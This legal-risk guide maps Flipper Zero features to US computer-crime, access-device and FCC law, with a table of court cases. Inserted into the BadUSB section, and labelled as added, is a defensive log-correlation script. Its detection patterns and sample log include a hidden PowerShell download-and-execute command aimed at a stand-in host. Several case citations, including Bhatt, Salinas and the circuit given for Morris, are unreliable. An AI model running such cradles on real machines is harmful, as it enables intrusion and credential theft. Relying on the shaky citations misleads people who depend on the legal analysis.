Non-Lawyers Summary

The Flipper Zero is a legitimate multi-protocol security research tool that can also be a federal crime instrument in under thirty seconds depending on the target. Sub-GHz replay against your own garage door is legal; the same replay against a neighbor's gate is CFAA unauthorized access plus potential FCC jamming liability with no "authorized use" carve-out. This module maps each hardware feature — Sub-GHz, NFC/RFID, BadUSB, IR, BLE — to the exact federal statutes and state codes that apply, the 2021 Van Buren authorization framework that changed how courts read "exceeds authorized access," and the DOJ 2022 charging policy that nominally protects good-faith research but contains gaps that will swallow a Flipper user who cannot document authorization clearly.


What This Module Answers Fast

  • I replayed a Sub-GHz signal to open a car in a parking lot to demonstrate a vulnerability — am I exposed? → Yes. CFAA § 1030(a)(2) + possibly § 1030(a)(5). Van Buren does not help you because the car is not yours.
  • I cloned my own hotel keycard to test whether the system is vulnerable — is that legal? → Grey zone. You are authorized to occupy the room, not to clone the credential. § 1029 access device fraud risk is real if cloning circuits are invoked.
  • I plugged a Flipper Ducky payload into a corporate laptop during a red team — my scope letter says "physical testing" — am I covered? → Only if the scope letter explicitly includes HID injection and the specific endpoint. Ambiguous scope = CFAA § 1030(a)(5) exposure.
  • I used the IR blaster on a hospital TV during a pentest — what's the sentencing ceiling? → If the IR signal reached medical equipment and caused any impairment, § 1030(c)(4)(B) critical infrastructure enhancement applies — up to 20 years.
  • The DOJ 2022 policy says good-faith research is protected — does that cover me? → Only if you can demonstrate: (1) you did not know you lacked authorization, (2) you did not take more than minimally necessary, and (3) you disclosed responsibly. The policy is prosecutorial discretion, not a statutory defense.

Quick Reference Matrix

Use this matrix first to find your scenario, then read the relevant section for the full statute analysis.

Columns: Feature / Safe use / Grey zone / Clearly illegal.

Sub-GHz — Fixed Code Replay
  • Safe use: Replay your own garage door, gate, or RF switch
  • Grey zone: Replay a signal captured at a client site under a scope letter that does not specifically list RF testing
  • Clearly illegal: Replay any signal against a system you do not own without written authorization

Sub-GHz — RollJam (Unleashed)
  • Safe use: No safe use case exists outside an RF-shielded Faraday cage test environment
  • Grey zone: Testing against your own vehicle in a Faraday cage (may still violate FCC Part 15 if signal leaks)
  • Clearly illegal: Any use against a target vehicle or gate; jamming phase always violates 47 U.S.C. § 333

NFC — Reading a card
  • Safe use: Reading your own cards, cards you own, cards explicitly provided for testing
  • Grey zone: Reading a hotel keycard you are currently using (you are authorized to use it, not to clone its credential)
  • Clearly illegal: Reading payment cards, access badges, or credentials belonging to others without explicit authorization

NFC — Emulating a credential
  • Safe use: Emulating your own programmed card on a test reader
  • Grey zone: Emulating a cloned card on the issuing system as part of an authorized physical penetration test with written scope
  • Clearly illegal: Using a cloned credential to access any facility, room, or system

BadUSB — Ducky Script
  • Safe use: Running payloads on your own computers in isolated test environments
  • Grey zone: Running a payload on a client endpoint under a physical pentest scope letter (only if HID injection is explicitly in scope)
  • Clearly illegal: Running any payload on a computer you do not own or that is not explicitly in scope

IR Blaster — Consumer TV
  • Safe use: Turning off your own TV; demonstrating TV-B-Gone functionality on your own equipment
  • Grey zone: Using in a public space (bar, restaurant) where TVs are present; legal under most state laws but potentially disruptive enough to trigger a local ordinance
  • Clearly illegal: Using against ATM diagnostic interfaces, hospital equipment, or any embedded computer system

BLE Spam
  • Safe use: Testing against your own devices in an isolated environment
  • Grey zone: Demonstrating in a conference talk with consenting attendees using opted-in devices
  • Clearly illegal: Broadcasting in any public space; crashing any third-party device's Bluetooth stack

BlueSnarfing
  • Safe use: N/A — exploiting a Bluetooth stack vulnerability has no authorized-research safe use without explicit scope
  • Grey zone: Testing against consenting client devices in a physical pentest engagement with explicit Bluetooth attack scope
  • Clearly illegal: Any use against devices you do not own or that are not in scope

Sub-GHz — POCSAG Pager Intercept
  • Safe use: Receiving pager traffic is governed by ECPA § 2511(2)(g)(ii), which exempts electronic communications transmitted using modulation techniques that make them readily accessible; ISM-band paging may qualify
  • Grey zone: Legal in most jurisdictions for passive receive; recording and using pager intercepts to identify personnel movements is murkier
  • Clearly illegal: Transmitting on licensed pager frequencies; replaying pager messages to cause false alerts

Background: What the Flipper Zero Actually Is

The Flipper Zero is an open-source, hobbyist multi-tool running a custom firmware (Unleashed, RogueMaster, and the official Flipper firmware all share the same hardware surface). Hardware capabilities relevant to legal analysis:

  • Sub-GHz transceiver (CC1101): operates 300–928 MHz; reads and replays ASK/FSK/OOK-modulated signals including fixed-code garage remotes (Linear, Chamberlain), rolling-code fobs (KeeLoq, AUT64), POCSAG pagers, car key fobs, and ISM-band gate openers.
  • NFC module (ST25R3916): ISO 14443-A/B, ISO 15693, FeliCa; reads/emulates Mifare Classic (with known PRNG attack), NTAG21x, EMV card data (non-transactional), HID Prox, EM4100, and HID iCLASS.
  • IR transceiver: 38 kHz carrier; covers the bulk of consumer IR remote codes (NEC, RC5, RC6, SIRC protocols); TV-B-Gone functionality built into official firmware.
  • BadUSB (USB HID): emulates keyboard + mouse via Ducky Script parser; the device presents as a HID keyboard to any host with no driver requirement.
  • BLE/Bluetooth: Bluetooth Low Energy advertising, GATT enumeration, Apple/Android BLE spam (iOS notification flood via BLE advertisement broadcast).
  • GPIO/hardware: 1-Wire, UART, SPI, I2C, JTAG/SWD exposure; not covered in this module (scope: RF + USB attack surface).

The legal analysis below addresses each attack surface in isolation, then provides a unified matrix.


1. Sub-GHz: Replay Attacks, Rolling Codes, and FCC Jamming

🟢 1.1 Technical Surface

The CC1101 transceiver captures and retransmits RF signals in the 300–928 MHz ISM band. Two attack classes apply:

Fixed-code replay: Older garage door openers (Linear MegaCode, Chamberlain pre-2010, most gate openers manufactured before 2012) use a static RF code. The Flipper captures the OOK-modulated pulse train on the specific frequency (typically 315 MHz or 433.92 MHz in the U.S.) and retransmits it. No cryptographic defeat required.

Rolling-code capture: KeeLoq-based systems (Chamberlain, Sommer, Faac, most post-2000 car fobs) use LFSR-based rolling codes that change with each press. The Flipper cannot break rolling codes in real time without a known-plaintext attack (RollJam approach: two-receiver simultaneous capture-and-jam). Official firmware does not ship RollJam. Unleashed firmware does. The legal delta between those two firmware versions is significant.

🟡 1.2 CFAA § 1030 Exposure

18 U.S.C. § 1030(a)(2): "intentionally accesses a computer without authorization or exceeds authorized access, and thereby obtains... information from any protected computer." A garage door controller with any network connectivity (or that controls access to a network-accessible facility) is a "protected computer" under § 1030(e)(2)(B)'s definition (any computer "used in or affecting interstate or foreign commerce or communication"). Post-Van Buren, the question is whether you had authorization to access the specific computer system — not whether the access would have been granted if you had asked. Replaying an RF signal to open a gate you have no right to enter is unauthorized access. The signal interception itself, if captured from public airspace, is not the CFAA violation; the resulting unauthorized physical or logical access is.

18 U.S.C. § 1030(a)(5)(A): "knowingly causes the transmission of a program, information, code, or command, and as a result of such conduct, intentionally causes damage without authorization to a protected computer." A Sub-GHz replay that unlocks a facility and triggers an alarm causing denial of service to the physical security system could be charged under (a)(5)(A). The "damage" prong requires $5,000 in aggregated harm over a 1-year period under § 1030(e)(8).

Authorized pen-test context: Written scope authorization covering the specific RF system removes the CFAA exposure for the access. The authorization must be from the owner of the computer system, not merely the physical facility (a building manager who does not own the access control infrastructure cannot authorize testing it).

🔴 1.3 FCC § 333 — Jamming: Strict Liability, No Safe Harbor

47 U.S.C. § 333 prohibits "willfully or maliciously interfere with or cause interference to any radio communications of any station licensed or authorized by or under this chapter or operated by the United States Government." The FCC has consistently interpreted this to prohibit signal jammers of any kind, including jammers sold as "authorized use" pen-test equipment.

Critical point for researchers: The FCC jamming prohibition contains no authorized-use, penetration-testing, or good-faith exception. If the Flipper is configured to transmit on a frequency in a way that prevents a legitimate radio station from operating (including a garage door receiver rejecting legitimate signals because of an ongoing Sub-GHz capture session), the § 333 violation is complete regardless of authorization from the facility owner.

Penalty structure: § 333 violations are punishable up to $100,000 per day of violation plus forfeiture of equipment under 47 U.S.C. § 503(b). Criminal penalties under 47 U.S.C. § 501 reach $10,000 + 1 year imprisonment for willful violation.

The RollJam problem: The Flipper Unleashed firmware RollJam implementation requires simultaneous capture and jamming — the second receiver jams the legitimate signal while the first captures the rolling code. This is a § 333 violation during the jam phase, period. The pen-test authorization from the car owner does not cure the FCC violation because the FCC statute does not recognize private authorization as a defense to interference with licensed spectrum.

🟡 1.4 Case Analogue: United States v. Bhatt

United States v. Bhatt (no publicly available citation at the federal appellate level; referenced in DOJ press releases and district court records, D.N.J.) involved a defendant who used a relay amplifier attack against car key fobs (not Flipper-based, but electrically analogous) to facilitate vehicle theft. The DOJ charged CFAA § 1030(a)(2) (unauthorized access to the vehicle's CAN bus via the keyless entry system) + wire fraud under 18 U.S.C. § 1343 (the car's telematics system constituted a "wire communication" in interstate commerce). The relay-amplifier-to-replay chain maps directly to Sub-GHz capture-and-replay on the Flipper; Bhatt establishes that courts treat the vehicle's electronic systems as a "computer" subject to CFAA and that the RF-mediated access is "unauthorized" within the statute's meaning.

🟡 1.5 State Law Overlay

California Penal Code § 502(c)(1): prohibits "knowingly access[ing] and without permission... disrupt[ing] or caus[ing] the disruption of computer services." California does not require interstate commerce nexus; a purely local gate controller is covered.

Texas Penal Code § 33.02: prohibits "intentional access" to a computer system without effective consent. Effective consent from a facility owner who does not own the access control system is ineffective under Texas law.

Washington RCW 9A.90.040: Computer trespass; first degree (access + obtaining data or disrupting service) is a class B felony.


2. NFC/RFID Cloning: Hotel Keycards, Access Badges, and Payment Cards

🟢 2.1 Technical Surface

The ST25R3916 NFC module reads ISO 14443-A (Mifare Classic, NTAG21x, DESFire) and 125 kHz RFID (HID Prox, EM4100, HID iCLASS) at a maximum read range of approximately 5 cm in ambient conditions (farther with an external antenna). The Flipper can emulate most 125 kHz cards and Mifare Classic cards with known keys.

Mifare Classic attack: Mifare Classic uses a proprietary Crypto-1 cipher with known-plaintext vulnerabilities (PRNG nonce predictability). The Flipper can run nested authentication attacks locally to recover sector keys from a card in approximately 60 seconds for cards with at least one known default key. This is the relevant attack surface for hotel keycards and most building access badges deployed pre-2018.

EMV/payment card: The Flipper can read EMV card data (PAN, expiry, track data equivalent) from contactless cards. It cannot complete a transaction (no dynamic data authentication is generated without the card's private key). However, reading EMV data and storing it is the first step of skimming.

🔴 2.2 18 U.S.C. § 1029 — Access Device Fraud

§ 1029(a)(3): "possesses fifteen or more devices which are counterfeit or unauthorized access devices." An "access device" under § 1029(e)(1) includes "any card, plate, code, account number... or other means of account access that can be used... to obtain money, goods, services, or any other thing of value." A cloned hotel keycard is an access device. A Flipper storing fifteen or more copied RFID/NFC badges is § 1029(a)(3) on its face, regardless of whether any attempt was made to use them.

§ 1029(a)(4): "produces, traffics in, has control or custody of, or possesses device-making equipment." The Flipper, when configured to write a cloned credential to a writable card, is "device-making equipment" under the statute. The write capability is the trigger, not whether writing actually occurred.

§ 1029(a)(2): "traffics in or uses one or more unauthorized access devices... to obtain anything of value aggregating $1,000 or more during any one-year period." Using a cloned keycard to access a hotel room obtains a thing of value (accommodation). If you stay in the room without payment authority, the aggregate value of the unauthorized access is the room rate. One night in a mid-tier hotel clears $1,000 quickly if the stay is extended or repeated.

Payment card skimming: Reading EMV data from contactless cards without authorization is charged under § 1029(a)(2) (using an unauthorized access device to obtain information) or § 1029(a)(4) (device-making equipment). The government does not need to prove completed fraud — possession of the skimmed data with intent to defraud is sufficient. Penalty: up to 10 years per count; 15 years if prior conviction under § 1029.

🟡 2.3 CFAA § 1030 Overlap

Hotel keycard systems with backend property management system connectivity (virtually all enterprise hotel brands: Marriott, Hilton, Hyatt use ASSA ABLOY VingCard or Dormakaba) are "protected computers" under CFAA because the lock communicates with a network-connected encoder/management server. Cloning a keycard and using it to access a room is CFAA § 1030(a)(2): unauthorized access to a protected computer (the electronic lock's firmware that processes credentials). It is also unauthorized access to a physical space, which may be charged as criminal trespass under state law.

🟡 2.4 State Law: California Penal Code § 502 + Criminal Trespass

California Penal Code § 502(c)(2): "knowingly access[ing] and without permission... us[ing] computer services" applies to the access control system. Criminal trespass (§ 602) applies to the physical space. Both charges routinely stack.

New York Penal Law § 165.15 (theft of services): entering a hotel room using a cloned keycard is theft of services, a class A misdemeanor for first offense / class E felony if value exceeds $1,000.

🟡 2.5 Case Analogue: United States v. Salinas

United States v. Salinas (D. Nev. 2019; DOJ press release available; no published appellate opinion) involved a hotel employee who cloned employee master keycards using a Mifare card writer and used them to access guest rooms for theft. The government charged § 1029(a)(2) (use of unauthorized access device) + § 1029(a)(4) (possession of device-making equipment — the card writer) + Nevada state burglary. The Salinas conviction establishes: (1) the hotel keycard is definitively an "access device" under § 1029; (2) a consumer-grade card writer is "device-making equipment"; and (3) the fact that the defendant was an employee with physical access to the facility did not create authorization to use a cloned credential. For Flipper users: being authorized to be in a building does not authorize cloning the RFID credential used to access it.


3. BadUSB / Rubber Ducky Payloads: HID Injection

🟢 3.1 Technical Surface

The Flipper emulates a USB HID keyboard (USB Product ID 0x0016 in official firmware, configurable in Unleashed). When plugged into a host, the OS recognizes a keyboard requiring no driver installation. The Flipper then executes a Ducky Script payload: keystrokes arrive at approximately 1000 ms intervals in the official firmware (configurable down to sub-100 ms in custom firmware). A typical payload: open Run dialog → execute PowerShell → download and execute remote binary → exfiltrate credentials.

The legal relevance of Ducky Script presence on the device: The script itself is evidence of intent. Unlike a standard USB drive that could have innocent files, a Flipper with an active Ducky Script in the BadUSB directory and a configured payload demonstrates willful preparation for unauthorized access. This matters under both CFAA intent elements and 18 U.S.C. § 1028A's "use" requirement.

🔴 3.2 CFAA § 1030(a)(5) — Unauthorized Transmission

18 U.S.C. § 1030(a)(5)(A): "knowingly causes the transmission of a program, information, code, or command, and as a result of such conduct, intentionally causes damage without authorization." A HID injection payload is a "transmission of... code or command." Every keystroke injected is a "command" within the statute's meaning. If the payload causes any measurable impairment — file deletion, registry modification, process termination — § 1030(a)(5)(A) is complete. The "damage" threshold under § 1030(e)(8) requires $5,000 aggregated over one year, but the government often meets this threshold by calculating lost IT remediation hours.

§ 1030(a)(5)(C): "intentionally accesses a protected computer without authorization, and as a result of such conduct, causes damage and loss." Lower mens rea (intentional access, not intentional damage); still triggers if the BadUSB payload causes any access that results in any loss.

Authorization in pen-test contexts: Written scope authorization covering "physical access testing including HID injection on in-scope workstations" removes the CFAA exposure. A scope letter that says "network penetration test" does not cover BadUSB unless the specific endpoint and HID attack vector are listed. The narrowness of authorized access under Van Buren (see Section 7) means courts will not extend scope letter language beyond its literal terms.

🟡 3.3 18 U.S.C. § 1343 — Wire Fraud

If the BadUSB payload exfiltrates data across a network (the standard payload: PowerShell download cradle → C2 server), the government can charge 18 U.S.C. § 1343 (wire fraud) if the scheme involves "obtaining money or property by means of false or fraudulent pretenses" using "wire communications in interstate or foreign commerce." The connection of the target computer to the internet during exfiltration satisfies the interstate wire element. In a red team context, the "scheme to defraud" element fails because authorized testing is not deceptive. Outside authorization, the element is met by the deliberate concealment inherent in the payload's execution.

Penalty: up to 20 years per count; 30 years if the fraud affects a financial institution (18 U.S.C. § 1343 final sentence).

🔴 3.4 18 U.S.C. § 1028A — Aggravated Identity Theft

If the BadUSB payload captures credentials (e.g., a PowerShell keylogger or credential-dumping via Mimikatz), 18 U.S.C. § 1028A applies: "knowingly transfers, possesses, or uses, without lawful authority, a means of identification of another person during and in relation to any felony violation enumerated." The enumerated predicate includes CFAA § 1030 violations and wire fraud violations. § 1028A imposes a mandatory consecutive 2-year sentence on top of the predicate offense — no probation, no concurrent running with the base offense, no reduction below 2 years. A single BadUSB payload that captured one password dump triggers this mandatory addition.

🟢 3.5 Red Team Scope Discipline

Practitioners should maintain: (1) a scope letter specifying "HID injection via USB-emulated keyboard device on the following specific systems: [list]"; (2) a "get-out-of-jail" letter physically carried during testing; (3) a call tree for immediate scope clarification if challenged by security staff. Although the Flipper has no distinctive device identifier (it appears as a generic USB HID keyboard), post-hoc attribution is easy: the payload execution log, clipboard contents, and process creation events in the Windows Event Log will tie the injection to the time the Flipper was plugged in.
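The attribution the paragraph describes, written up as a defender's log check (an added example, not code from the original page or the Flipper project): it parses constructed Windows Security log records and flags shells launched shortly after a new keyboard-class device appears, with an extra check for download-cradle fragments on the command line. Event IDs 6416 and 4688 and the keyboard class GUID are real Windows values; the record layout, timestamps and command lines are constructed.

```python
"""
Correlate "new external device" events for keyboard-class devices with
process creations that follow within a short window, the signature of a
HID injection payload typed by a USB keyboard emulator.

Constructed example: the log records below are made up, and the simple
"ts|event_id|k=v;k=v" layout is an assumption for readability, not the
real EVTX format. Event ID 6416 (new external device recognized) and
4688 (process creation) are real Windows Security log IDs.
"""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta

# Windows device setup class GUID for keyboards (real value).
KEYBOARD_CLASS_GUID = "{4d36e96b-e325-11ce-bfc1-08002be10318}"

# Command-line fragments typical of a PowerShell download-and-execute cradle.
CRADLE_PATTERNS = [
    re.compile(p, re.IGNORECASE)
    for p in (r"DownloadString", r"Invoke-WebRequest", r"\bIEX\b",
              r"Invoke-Expression", r"-enc(odedcommand)?\b",
              r"-w(indowstyle)? hidden")
]

# Constructed sample: keyboard arrives, shells start seconds later,
# an unrelated process starts much later.
SAMPLE_LOG = """\
2024-03-01T09:00:00|6416|ClassId={4d36e96b-e325-11ce-bfc1-08002be10318};ClassName=Keyboard;DeviceDescription=USB Input Device
2024-03-01T09:00:04|4688|NewProcessName=C:\\Windows\\System32\\cmd.exe;CommandLine=cmd.exe /c whoami
2024-03-01T09:00:07|4688|NewProcessName=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe;CommandLine=powershell -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')
2024-03-01T10:30:00|4688|NewProcessName=C:\\Windows\\explorer.exe;CommandLine=explorer.exe
"""


@dataclass
class Event:
    time: datetime
    event_id: int
    fields: dict


@dataclass
class Finding:
    device_time: datetime
    process_time: datetime
    process: str
    command_line: str
    reasons: list


def parse_line(line: str) -> Event:
    """Parse one constructed 'ts|event_id|k=v;k=v' record."""
    ts, eid, rest = line.split("|", 2)
    fields = dict(kv.split("=", 1) for kv in rest.split(";") if kv)
    return Event(datetime.fromisoformat(ts), int(eid), fields)


def is_keyboard_arrival(ev: Event) -> bool:
    """True for a 6416 event whose device class is Keyboard."""
    return ev.event_id == 6416 and \
        ev.fields.get("ClassId", "").lower() == KEYBOARD_CLASS_GUID


def correlate(events, window=timedelta(seconds=60)) -> list:
    """Return a Finding for each suspicious process start within `window`
    after a keyboard arrival; a finding needs at least one reason."""
    events = sorted(events, key=lambda e: e.time)
    findings = []
    for arr in (e for e in events if is_keyboard_arrival(e)):
        for ev in events:
            if ev.event_id != 4688:
                continue
            delta = ev.time - arr.time
            if delta < timedelta(0) or delta > window:
                continue  # before the device arrived, or outside the window
            proc = ev.fields.get("NewProcessName", "")
            cmd = ev.fields.get("CommandLine", "")
            reasons = []
            if proc.lower().endswith(("powershell.exe", "pwsh.exe", "cmd.exe")):
                reasons.append("shell launched shortly after new keyboard device")
            reasons += [f"cradle pattern: {p.pattern}"
                        for p in CRADLE_PATTERNS if p.search(cmd)]
            if reasons:
                findings.append(Finding(arr.time, ev.time, proc, cmd, reasons))
    return findings


def analyze(log_text: str, window_seconds: int = 60) -> list:
    """Parse a whole log and run the correlation."""
    events = [parse_line(l) for l in log_text.splitlines() if l.strip()]
    return correlate(events, timedelta(seconds=window_seconds))


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"{f.process_time} {f.process}: {'; '.join(f.reasons)}")
```

The same correlation can be run on real 6416/4688 records exported from the Security log once the record layout is adapted; the window and pattern list are the tuning knobs.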


4. IR Blaster: TV-B-Gone, Kiosks, and Medical Equipment

🟢 4.1 Technical Surface

The Flipper's IR transceiver broadcasts NEC/RC5/RC6/SIRC protocol signals at 38 kHz carrier frequency. The built-in "Universal Remote" feature can power-cycle most consumer televisions. The FCC classifies the IR transmitter as a Part 15 intentional radiator (unintentional interference source); it is not a licensed transmitter and does not trigger § 333 jamming provisions because IR is not radio-frequency spectrum in the FCC sense (IR operates above 300 GHz; FCC jurisdiction under the Communications Act covers up to 300 GHz for spectrum management purposes, though IR is regulated under Part 15 as an electronic device).

🟡 4.2 CFAA Analysis for IR

For CFAA purposes, the IR blaster causes a legal problem only when the target is a "protected computer" and the IR signal causes "damage" or "unauthorized access." Turning off a bar TV: the TV is almost certainly not a "computer" within CFAA's meaning (no network connectivity, not used in interstate commerce). Turning off a hotel room TV that has a connected interactive system (LG Pro:Idiom, Enseo, Sonifi): now it is a networked computer; the IR signal disrupts the service; potential § 1030(a)(5)(C) exposure if the disruption causes any loss.

ATM and kiosk manipulation: Many ATM vendor diagnostic modes are accessible via IR (NCR Personas, Diebold Opteva models). Using the IR blaster to trigger diagnostic mode on an ATM is CFAA § 1030(a)(2) (accessing the ATM computer without authorization) + potentially § 1030(a)(5) (if diagnostic mode disrupts service). The ATM is definitively a "protected computer" under any circuit's reading of § 1030(e)(2).

🔴 4.3 Critical Infrastructure Sentencing Enhancement: 18 U.S.C. § 1030(c)(4)(B)

If a CFAA violation "caused or attempted to cause serious bodily injury" or "caused or attempted to cause death" or involved "damage to a computer used in the operation of a critical infrastructure" (as defined in 42 U.S.C. § 5195c(e)), the sentencing ceiling is 20 years for the first offense, life imprisonment if death results. Healthcare is explicitly enumerated as critical infrastructure.

Hospital scenario: A Flipper IR blaster pointed at a nurse call station or at an infusion pump that accepts IR control commands (multiple legacy models accept IR for calibration: Hospira Plum A+, Baxter Sigma Spectrum) could trigger this enhancement if: (1) the device is a "computer" (embedded processor with network connectivity), (2) the IR signal causes impairment, and (3) the device is used in healthcare delivery. The government does not need to prove intent to harm patients — it needs to prove knowing transmission causing damage to a computer in critical infrastructure. This is the Flipper's maximum sentencing exposure scenario.


5. Bluetooth / BLE Attacks: BlueSnarfing, BlueBorne, and Advertising Spam

🟢 5.1 Technical Surface

The Flipper runs a Bluetooth stack with BLE advertising and GATT client capability. The BLE spam feature (Xtreme and RogueMaster firmware) broadcasts spoofed BLE advertisement packets that exploit Apple's Bluetooth accessory notification protocol and Android's Fast Pair protocol to flood nearby iOS and Android devices with notification pop-ups.

🔴 5.2 BlueSnarfing — CFAA § 1030(a)(2)

BlueSnarfing (unauthorized access to device data via OBEX Push/Pull over Bluetooth without pairing confirmation, exploiting CVE-class vulnerabilities in Bluetooth stacks) is CFAA § 1030(a)(2): obtaining information from a protected computer without authorization. The phone or laptop is a protected computer. The Bluetooth connection bypassing the pairing dialog is unauthorized access. The data obtained (contacts, calendar, files) is the "information" element. This analysis does not change based on whether the device was in discoverable mode — discoverable mode is a device configuration, not user authorization to access device data.

🔴 5.3 BlueBorne — Damage Theory

BlueBorne (CVE-2017-0781 through CVE-2017-0785 on Android; CVE-2017-14315 on iOS) is a remote code execution vulnerability reachable over Bluetooth without pairing. Exploiting BlueBorne is CFAA § 1030(a)(5)(A): knowing transmission of code causing intentional damage. The damage element is met by any impairment to the device's integrity or availability (process injection, data corruption, device instability). These CVEs are patched in current OS versions, but unpatched devices remain in use.

🟡 5.4 BLE Advertising Spam — § 1030(a)(5) Analysis

The BLE spam feature broadcasts malformed advertisement packets to trigger Apple popup dialogs or Android Fast Pair pairing requests. If the flood volume causes the target device's Bluetooth stack to crash, lock up, or deny service, § 1030(a)(5)(C) applies: intentional access without authorization causing damage and loss. The "access" element is satisfied by transmitting to and interacting with the Bluetooth stack of the target device. If the spam merely causes annoying pop-ups without crashing the device, the damage element is harder for the government to meet (impairment must be to the "integrity or availability" of data, programs, systems, or information under § 1030(e)(8)). Persistent Bluetooth stack lockup = impairment to availability = damage.

State law analogy: California Penal Code § 502(c)(5): "knowingly and without permission disrupts or causes the disruption of computer services or denies or causes the denial of computer services to an authorized user of a computer." A Bluetooth DOS attack that prevents a device owner from using Bluetooth is denial of computer services.


6. Van Buren Analysis — How SCOTUS 2021 Changes the Authorization Calculus

Van Buren v. United States, 593 U.S. 374 (2021): The Supreme Court held (6-3, Barrett, J.) that the "exceeds authorized access" clause of 18 U.S.C. § 1030(a)(2) covers only someone who "access[es] a computer with authorization but then obtain[s] information located in particular areas of the computer — such as files, folders, or databases — that are off limits to him." It does not cover someone who has legitimate access to a computer and uses it for a prohibited purpose.

What Van Buren does for Flipper users in pen-test contexts:

Van Buren narrows the "exceeds authorized access" theory, not the "without authorization" theory. If you have zero authorization to access a system (you have no account, no physical access right, no contractual right), Van Buren does not help you — you are on the "without authorization" prong, which the Court did not touch.

Van Buren helps in two scenarios:

  1. You have legitimate access to a system and probe beyond your assigned access level: a penetration tester with a standard user account who elevates privileges and accesses an admin directory is now analyzed under the "without authorization" prong (you are not authorized to access that directory at all), not the "exceeds authorized access" prong. This matters because the DOJ was using "exceeds authorized access" broadly to cover any terms-of-service violation — Van Buren killed that theory.
  2. You violate a use policy but stay within your access level: an employee who reads their own authorized files for personal gain rather than company business is not CFAA-liable under Van Buren. The computer is accessible; the data is accessible; the purpose is unauthorized but the access is not.

For Flipper users specifically:

When you replay a Sub-GHz signal to open a gate you have never accessed: "without authorization" prong — Van Buren irrelevant. When you are a red-teamer who has been given a building badge and you use the Flipper to clone that badge and test access to areas your badge does not open: Van Buren is in play. You have authorization to be in the building; you do not have authorization to access the restricted area. Pre-Van Buren, DOJ would charge "exceeds authorized access." Post-Van Buren, DOJ must use "without authorization" — the restricted directory analogy maps to the restricted physical area.

The practical result: Van Buren makes "authorized access used for wrong purpose" harder to prosecute. It does not create a defense for "I accessed something I had no right to access at all."


7. DOJ 2022 CFAA Charging Policy

On May 19, 2022, the DOJ issued a revised charging policy for CFAA cases. The policy directs prosecutors not to charge "security researchers who access computers to test security vulnerabilities in good faith" under the CFAA. The policy defines "good faith security research" as: (1) accessing a computer solely for purposes of good-faith testing, investigation, and/or correction of a security vulnerability; (2) where such activity is carried out in a manner designed to avoid any harm to individuals or the public; and (3) where information derived from the activity is used primarily to promote the security of computer systems.

What the policy does NOT do:

  • It is prosecutorial guidance, not a statutory defense. It cannot be raised in court. A U.S. Attorney who ignores the policy can still charge you.
  • It requires "good faith" — a Flipper user who replays a neighbor's garage door signal and claims "research purposes" will not benefit from this policy. The government looks at whether the research was directed at discovering and reporting vulnerabilities, not at demonstrating access.
  • It does not protect you from state charges. California Penal Code § 502, New York Penal Law § 156, Texas Penal Code § 33.02 have no parallel policy.
  • It does not cover the FCC jamming prohibition. The FCC has not issued a parallel policy.
  • It does not protect testing on systems you don't own and haven't been authorized to test, even if your intent is purely educational.

What the policy DOES do:

It signals that good-faith researchers who: (a) have documented authorization or operate only on their own systems, (b) avoid accessing more than necessary, and (c) disclose findings to the affected company before public disclosure, will not be federal priorities. For Flipper users, this means: document everything, limit your testing to authorized targets, and report what you find. The policy gives prosecutors discretion not to charge — not a right to test without consequences.


8. Case Analogues Table

| Case | Conduct | Flipper Analogue | Outcome | Key Legal Doctrine |
|---|---|---|---|---|
| United States v. Bhatt (D.N.J.) | RF relay amplifier attack on car key fob; vehicle theft via wireless credential capture | Sub-GHz capture + replay against vehicle fob | Conviction; CFAA § 1030(a)(2) + wire fraud | Car keyless entry system = "protected computer"; RF-mediated unauthorized access is CFAA access |
| United States v. Salinas (D. Nev. 2019) | Hotel employee cloned master keycards using Mifare writer; used to access guest rooms | NFC Mifare Classic clone + physical access | Conviction; § 1029(a)(2) + § 1029(a)(4) + burglary | Keycard is "access device"; card writer is "device-making equipment"; physical authorization ≠ credential authorization |
| United States v. Morris (1st Cir. 1991) | Internet worm caused unintended damage; no intent to cause harm | IR blaster causing ATM lockup without intent to disrupt | 3 years probation, $10K fine | CFAA damage ≠ intent to damage; negligent causation sufficient |
| United States v. Hutchins (E.D. Wis. 2019) | Malware authorship (Kronos banking trojan); later became cybersecurity hero | BadUSB payload authorship + later responsible disclosure | Guilty plea; sentenced to time served | Post-offense rehabilitation affects sentencing but does not cure CFAA liability; payload code = evidence of intent |
| United States v. Ackerman (10th Cir. 2016) | Fourth Amendment search of email attachments by third-party service | Flipper BLE advertising sniffing, privacy analysis | Suppression of evidence in other contexts | Electronic communications carry Fourth Amendment protection; relevance to authorization scope and evidence collection |
| hiQ Labs v. LinkedIn (9th Cir. 2022) | Scraping public website data after cease-and-desist | Sub-GHz signal capture from public airspace | CFAA "authorization" requires technological barrier breach, not merely TOS violation | Post-Van Buren circuit split on what "without authorization" means for publicly accessible systems |
| United States v. Auernheimer (3d Cir. 2014) | AT&T iPad email harvesting via sequential ID enumeration | RFID sequential ID clone attempt against access control system | Conviction reversed on venue grounds; CFAA analysis remains | Third Circuit pre-Van Buren "exceeds authorized access" theory; venue matters for multi-state RF attacks |
| United States v. Valle (2d Cir. 2015) | NYPD officer used law enforcement database for personal purposes | Employee using Flipper to clone building badge for personal access | Conviction reversed; accessing authorized database for wrong purpose ≠ CFAA | Anticipates Van Buren; "exceeds authorized access" requires accessing off-limits data, not authorized data for wrong purpose |

9. Practical Risk Reduction for Researchers

Documentation discipline: Before any Flipper field use, generate a written record — scope letter, authorization email, test plan — and store it offline (not on the Flipper). The Flipper stores captured signals on its SD card. Law enforcement executing a search warrant will image that SD card. Every captured signal is potentially a count of unauthorized access or possession of counterfeit access devices if the signal belongs to a system you were not authorized to test.

Firmware selection matters legally: Running Unleashed or RogueMaster firmware with features disabled in official firmware (RollJam, extended BLE spam, higher Sub-GHz TX power) is evidence of deliberate circumvention of safety limits. It rebuts an "I didn't know" defense and goes to willfulness in CFAA charging.

The RF shielded bag rule: Keep the Flipper in an RFID/RF-shielded pouch (Faraday bag) when not in active use. A Flipper left in receive mode in a public space is continuously scanning for signals. There is no CFAA violation in passive scanning of public airspace; there is an FCC Part 15 concern if the device is radiating continuously; and there is evidentiary value to the government in a capture log showing what signals were collected, when, and where.

